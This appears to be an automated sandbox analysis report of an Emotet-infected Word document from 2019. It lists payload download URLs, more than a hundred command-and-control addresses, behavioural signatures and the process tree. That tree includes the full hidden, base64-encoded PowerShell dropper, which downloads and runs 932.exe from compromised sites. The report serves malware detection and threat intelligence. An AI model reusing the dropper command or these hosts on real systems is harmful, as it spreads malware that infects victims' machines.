Analysis
-
max time kernel
28s -
resource
win10v191014 -
submitted
19-12-2019 17:27
General
Malware Config
Extracted
http://pcms.bridgeimprex.com/zAqMf/
http://test.a1enterprise.com/jxl/xo/
http://app.bridgeimpex.org/img/H4sNbg51/
http://a1enterprises.com/wp-content/BpOszbMoI/
http://isabella.makeyourselfelaborate.com/wp-admin/u19xl/
Extracted
emotet
47.149.28.234:80
71.83.82.123:8080
200.114.167.85:80
108.61.99.179:8080
165.227.156.155:443
159.69.89.130:8080
167.99.105.223:7080
188.152.7.140:80
91.73.197.90:80
120.150.246.241:80
91.205.215.66:443
87.230.19.21:8080
75.80.148.244:80
138.122.5.214:8080
219.78.255.48:80
104.131.11.150:8080
121.88.5.176:443
178.209.71.63:8080
179.13.185.19:80
12.176.19.218:80
86.98.156.239:443
104.137.176.186:80
206.81.10.215:8080
160.16.215.66:8080
182.176.132.213:8090
108.179.206.219:8080
201.184.105.242:443
45.51.40.140:80
1.215.28.101:8080
103.86.49.11:8080
212.129.24.79:8080
92.222.216.44:8080
173.12.14.133:8080
190.162.159.212:80
62.138.26.28:8080
159.65.25.128:8080
173.91.11.142:80
64.53.242.181:8080
2.38.99.79:80
107.170.24.125:8080
138.59.177.106:443
1.33.230.137:80
190.220.19.82:443
108.20.69.44:80
46.105.131.87:80
59.148.227.190:80
110.143.57.109:80
73.214.99.25:80
66.25.34.20:80
59.103.164.174:80
120.151.135.224:80
183.102.238.69:465
217.160.182.191:8080
174.81.132.128:80
165.228.24.197:80
78.24.219.147:8080
108.191.2.72:80
47.6.15.79:443
104.131.44.150:8080
70.175.171.251:80
82.155.161.203:80
184.167.148.162:80
200.7.243.108:443
45.33.49.124:443
85.67.10.190:80
2.235.190.23:8080
206.189.112.148:8080
209.141.54.221:8080
67.225.179.64:8080
173.247.19.238:80
110.142.38.16:80
58.171.42.66:8080
139.130.241.252:443
5.154.58.24:80
128.65.154.183:443
149.202.153.252:8080
85.152.174.56:80
211.63.71.72:8080
169.239.182.217:8080
195.244.215.206:80
24.93.212.32:80
85.72.180.68:80
209.97.168.52:8080
101.187.247.29:80
61.197.110.214:80
100.14.117.137:80
186.67.208.78:8080
104.236.246.93:8080
210.6.85.121:80
178.237.139.83:8080
174.77.190.137:8080
73.176.241.255:80
73.11.153.178:8080
197.254.221.174:80
116.48.142.21:443
74.105.102.97:8080
192.241.255.77:8080
62.75.187.192:8080
87.106.136.232:8080
181.57.193.14:80
211.44.35.111:80
47.156.70.145:80
144.139.247.220:80
46.216.60.138:80
186.75.241.230:80
218.44.21.114:80
91.242.138.5:443
66.209.97.122:8080
5.88.182.250:80
201.173.217.124:443
2.237.76.249:80
80.21.182.46:80
110.143.84.202:80
81.0.63.86:8080
176.106.183.253:8080
93.147.141.5:80
176.31.200.130:8080
167.71.10.37:8080
5.196.74.210:8080
31.131.182.30:80
31.172.240.91:8080
178.210.51.222:8080
31.31.77.83:443
190.147.215.53:22
212.64.171.206:80
66.34.201.20:7080
95.128.43.213:8080
Signatures
-
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
WINWORD.EXE932.exe932.exepid process 4800 WINWORD.EXE 4448 932.exe 4564 932.exe -
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4056 4900 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 4056 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
Powershell.exepid process 4056 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
Powershell.exe932.exedescription pid process target process PID 4056 wrote to memory of 4448 4056 Powershell.exe 932.exe PID 4448 wrote to memory of 4564 4448 932.exe 932.exe -
Executes dropped EXE 2 IoCs
Processes:
932.exe932.exepid process 4448 932.exe 4564 932.exe -
Suspicious behavior: EmotetMutantsSpam 1 IoCs
Processes:
932.exepid process 4564 932.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
WINWORD.EXEpid process 4800 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\329915e7a80ca2eaa941d1e7dd96c6308f5cdf054dbf8e8d546ae0571e5ebd43.doc" /o ""1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABZAHoAeAB5AHkAcQB4AGoAPQAnAFMAagBmAHcAbQB5AGUAbQAnADsAJABFAGQAbgB3AG8AYgByAHUAZQBuAHkAbwAgAD0AIAAnADkAMwAyACcAOwAkAFEAYwBtAG4AbwBjAHYAcgBjAGUAZQBlAD0AJwBKAHgAYgB4AHEAdAB2AGcAbABkAGYAdwB2ACcAOwAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBkAG4AdwBvAGIAcgB1AGUAbgB5AG8AKwAnAC4AZQB4AGUAJwA7ACQASgBsAHEAcABqAGgAdwBsAGwAPQAnAEMAcgB0AHgAbgBlAGcAeQBjAGIAZAAnADsAJABLAHAAegByAGcAdABvAGIAcwBwAD0ALgAoACcAbgBlAHcAJwArACcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAEUAdAAuAHcAZQBCAEMAbABJAEUATgB0ADsAJABPAGsAbgBmAG0AZQBsAHQAPQAnAGgAdAB0AHAAOgAvAC8AcABjAG0AcwAuAGIAcgBpAGQAZwBlAGkAbQBwAHIAZQB4AC4AYwBvAG0ALwB6AEEAcQBNAGYALwAqAGgAdAB0AHAAOgAvAC8AdABlAHMAdAAuAGEAMQBlAG4AdABlAHIAcAByAGkAcwBlAC4AYwBvAG0ALwBqAHgAbAAvAHgAbwAvACoAaAB0AHQAcAA6AC8ALwBhAHAAcAAuAGIAcgBpAGQAZwBlAGkAbQBwAGUAeAAuAG8AcgBnAC8AaQBtAGcALwBIADQAcwBOAGIAZwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AYQAxAGUAbgB0AGUAcgBwAHIAaQBzAGUAcwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAEIAcABPAHMAegBiAE0AbwBJAC8AKgBoAHQAdABwADoALwAvAGkAcwBhAGIAZQBsAGwAYQAuAG0AYQBrAGUAeQBvAHUAcgBzAGUAbABmAGUAbABhAGIAbwByAGEAdABlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB1ADEAOQB4AGwALwAnAC4AIgBTAHAAYABMAGkAdAAiACgAJwAqACcAKQA7ACQAVwB4AGoAcgBpAGgAcwBnAG4APQAnAFMAbwBwAG8AcQBtAGwAcABvAGMAcgBlACcAOwBmAG8AcgBlAGEAYwBoACgAJABWAHUAZQBpAGYAaQB5AHUAcQBpAGMAcQAgAGkAbgAgACQATwBrAG4AZgBtAGUAbAB0ACkAewB0AHIAeQB7ACQASwBwAHoAcgBnAHQAbwBiAHMAcAAuACIARABvAHcAYABOAGAATABvAEEAZABGAEkATABFACIAKAAkAFYAdQBlAGkAZgBpAHkAdQBxAGkAYwBxACwAIAAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgApADsAJABQAGIAcAB4AGYAZQBmAHcAaQBzAGwAPQAnAEQAZQBxAGgAcABnAHoAZQB6ACcAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQAVwBxAGMAdABrAGIAdwBqAHYAegB2ACkALgAiAEwARQBuAGAARwB0AEgAIgAgAC0AZwBlACAAMwAxADUAMQA5ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAGEAcgB0ACIAKAAkAFcAcQBjAHQAawBiAHcAagB2AHoAdgApADsAJABQAHAAbgBhAGYAZgB0AHcAZAA9ACcARABqAGgAZwBuAHcAZgB3AGMAJwA7AGIAcgBlAGEAawA7ACQASQBsAHkAdgBjAHgAbgBqAHEAPQAnAFAAcABwAHMAdwBkAG4AcgBiAGMAawB5AG4AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBsAGgAdQBzAHAAcABpAGgAPQAnAEoAYwB2AGoAdABjAHQAZgAnAA==1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\932.exe"C:\Users\Admin\932.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Executes dropped EXE
-
C:\Users\Admin\932.exe--6a4693d63⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious behavior: EmotetMutantsSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\932.exe
-
C:\Users\Admin\932.exe
-
C:\Users\Admin\932.exe
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-634046074-2673730973-2644684987-1000\0f5007522459c86e95ffcc62f32308f1_293fa5bd-edfb-4bba-800e-a7dce3ea3438
-
memory/4448-10-0x0000000002280000-0x0000000002297000-memory.dmpFilesize
92KB
-
memory/4564-13-0x0000000002140000-0x0000000002157000-memory.dmpFilesize
92KB
-
memory/4564-14-0x0000000000400000-0x0000000000486000-memory.dmpFilesize
536KB